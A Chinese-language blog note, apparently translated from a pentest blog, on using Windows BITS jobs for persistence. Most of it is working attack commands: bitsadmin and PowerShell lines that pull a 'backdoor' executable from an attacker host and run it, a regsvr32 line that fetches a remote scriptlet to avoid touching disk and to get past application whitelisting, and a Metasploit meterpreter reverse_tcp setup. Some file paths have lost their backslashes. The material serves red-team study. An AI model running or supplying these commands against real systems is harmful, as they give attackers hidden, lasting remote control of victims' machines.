Window許可權維持之BITS Jobs利用

• 2019 年 12 月 9 日
• 筆記

0x00:簡介

Windows作業系統包含各種實用程式，系統管理員可以使用它們來執行各種任務。這些實用程式之一是後台智慧傳輸服務（BITS），它可以促進文件到Web伺服器（HTTP）和共享文件夾（SMB）的傳輸能力。Microsoft提供了一個名為「 bitsadmin 」 的二進位文件和PowerShell cmdlet，用於創建和管理文件傳輸。

0x01:過程

從攻擊的角度來看，可以濫用此功能，以便在受感染的主機上下載有效負載（可執行文件，PowerShell腳本，Scriptlet等）並在給定時間執行這些文件，以在紅色團隊操作中保持持久性。但是，與「 bitsadmin 」 進行交互需要管理員級別的許可權。執行以下命令會將惡意有效負載從遠程位置下載到本地目錄。

bitsadmin /transfer backdoor /download /priority high http://10.0.2.21/pentestlab.exe C:tmppentestlab.exe

Bitsadmin –文件傳輸

還有一個PowerShell cmdlet可以執行相同的任務。

Start-BitsTransfer -Source "http://10.0.2.21/pentestlab.exe

BitsTrasfer –傳輸文件PowerShell

將文件放入磁碟後，可以通過從「 bitsadmin 」實用程式執行以下命令來實現持久性。用法非常簡單：

1、在創建參數需要作業的名稱

2、該addfile需要文件的遠程位置和本地路徑

3、該SetNotifyCmdLine將執行的命令

4、所述SetMinRetryDelay定義時間回調（秒）

5、該簡歷參數將運行位工作。

bitsadmin /create backdoor  bitsadmin /addfile backdoor "http://10.0.2.21/pentestlab.exe"  "C:tmppentestlab.exe"  bitsadmin /SetNotifyCmdLine backdoor C:tmppentestlab.exe NUL  bitsadmin /SetMinRetryDelay "backdoor" 60  bitsadmin /resume backdoor

持久性—BITS Jobs

當作業在系統上運行時，有效負載將被執行，Meterpreter會話將打開，或者通訊將被接收回命令和控制（取決於場合中使用的C2）。

持久性– BITS Jobs Meterpreter

參數SetNotifyCmdLine也可以用於通過regsvr32實用程式從遠程位置執行scriptlet 。這種方法的好處是它不會接觸磁碟，並且可以避開將應用程式列入白名單的產品。

bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.0.2.21:8080/FHXSd9.sct scrobj.dll"  bitsadmin /resume backdoor

BITS Jobs – Regsvr32

Metasploit框架可用於通過Web交付模組捕獲有效負載。

use exploit/multi/script/web_delivery  set target 3  set payload windows/x64/meterpreter/reverse_tcp  set LHOST 10.0.2.21  exploit

0x02:來源

文章翻譯至

https://pentestlab.blog/2019/10/30/persistence-bits-jobs/